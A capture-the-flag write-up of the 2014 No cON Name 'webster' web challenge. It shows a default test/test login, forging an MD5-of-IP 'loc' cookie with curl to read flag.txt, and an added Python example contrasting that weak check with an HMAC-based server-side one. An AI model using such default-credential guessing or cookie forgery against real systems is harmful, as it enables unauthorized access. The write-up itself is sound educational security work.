This year’s “No cON Name Capture The Flag” quals had more than three challenges to compete for the final, so big thanks to the organizers for extending last year’s limit. As of now (09:27 am GMT+2), @DefCon-UA (dcua team) has finished all challenges with +12 hours left before the competition’s end. So it’s time to draft some web write-ups.

The first one, “webster”, a 200-point web challenge, shows us a login form. After multiple SQLi, XPath, LDAP… injection attempts with no luck, I tried logging in with common accounts.

Username ‘test’ with password ‘test’ was the lucky combination that gave access to the main private area.



We have id, filename, location and username columns for 4 files, and Captain Obvious says flag.txt is our target file. But not so fast: something is blocking our attempts to read this file. It says:

"Seems that you are not in the right place for that"

So I am not in the right place? Where could we go to get permissions on that file? Look at the cookies and pay close attention to the one called ‘loc’:


Oh! It looks like the MD5 of something we couldn’t identify on the first try. But wait, maybe location means IP? Let’s try with the one that appears in the column:

>>> import hashlib
>>> ip=''  # IP from the location column
>>> hashlib.md5(ip.encode()).hexdigest()

Yes! It’s the same IP in hashed form, so can you figure out the rest? Let’s try replacing this cookie with the location f528764d624db129b32c21fbca0cb8d6.

$ curl -vvv -k '' -H 'Cookie: loc=f528764d624db129b32c21fbca0cb8d6; valid_user=test;  PHPSESSID=uo8lqqhf0slqhn6nbclbnosp04;'
* Adding handle: conn: 0x7fe7cb804000
* Adding handle: send: 0
* Adding handle: recv: 0
* Curl_addHandleToPipeline: length: 1
* - Conn 0 (0x7fe7cb804000) send_pipe: 1, recv_pipe: 0
* About to connect() to port 443 (#0)
*   Trying
* Connected to ( port 443 (#0)
* TLS 1.0 connection using TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
* Server certificate:
> GET /webster/content.php?op=4 HTTP/1.1
> User-Agent: curl/7.30.0
> Host:
> Accept: */*
> Cookie: loc=f528764d624db129b32c21fbca0cb8d6; valid_user=test;  PHPSESSID=uo8lqqhf0slqhn6nbclbnosp04;
< HTTP/1.1 200 OK
* Server nginx is not blacklisted
< Server: nginx
< Date: Sun, 14 Sep 2014 08:55:48 GMT
< Content-Type: text/html
< Content-Length: 38
< Connection: keep-alive
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Strict-Transport-Security: max-age=15768000


flag: NCN_f528764d624db129b32c21fbca0cb8d6
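
The weakness behind this challenge is that the server authorizes on an unkeyed MD5 of an IP address taken from a client-controlled cookie. The following is an added example, not code from the original post or from the challenge, that puts that check beside a server-side one; the IP address, the key handling and all function names are assumptions.

```python
import hashlib
import hmac
import os

# Assumed server-side secret; a real deployment loads it from configuration.
SERVER_KEY = os.urandom(32)
# Constructed sample address (documentation range) standing in for the "location" column.
ALLOWED_IP = "192.0.2.10"


def weak_check(cookies):
    """Pattern the write-up describes: trust an unkeyed MD5 sent by the client."""
    expected = hashlib.md5(ALLOWED_IP.encode()).hexdigest()
    return cookies.get("loc") == expected


def issue_loc_token(session_id, remote_addr):
    """Server-issued token: HMAC over the session id and the address the server saw."""
    msg = f"{session_id}|{remote_addr}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def hardened_check(cookies, session_id, remote_addr):
    """Decide from server-observed state; the cookie must also carry a valid MAC."""
    if remote_addr != ALLOWED_IP:
        return False
    expected = issue_loc_token(session_id, remote_addr)
    # Constant-time comparison avoids leaking how many characters matched.
    return hmac.compare_digest(cookies.get("loc", ""), expected)


def demo():
    sid = "constructed-session-id"
    # Client-chosen cookie: the MD5 of the allowed IP, computable by anyone.
    guessed = {"loc": hashlib.md5(ALLOWED_IP.encode()).hexdigest()}
    # Cookie the server itself issued to a client seen at the allowed address.
    genuine = {"loc": issue_loc_token(sid, ALLOWED_IP)}
    return {
        "weak_accepts_guessed": weak_check(guessed),
        "hardened_accepts_guessed_remote": hardened_check(guessed, sid, "198.51.100.7"),
        "hardened_accepts_guessed_local": hardened_check(guessed, sid, ALLOWED_IP),
        "hardened_accepts_genuine": hardened_check(genuine, sid, ALLOWED_IP),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

The hardened check takes `remote_addr` from the connection, so behind a reverse proxy it has to come from a header set only by that trusted proxy.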

PS: Thanks to my dcua teammates.

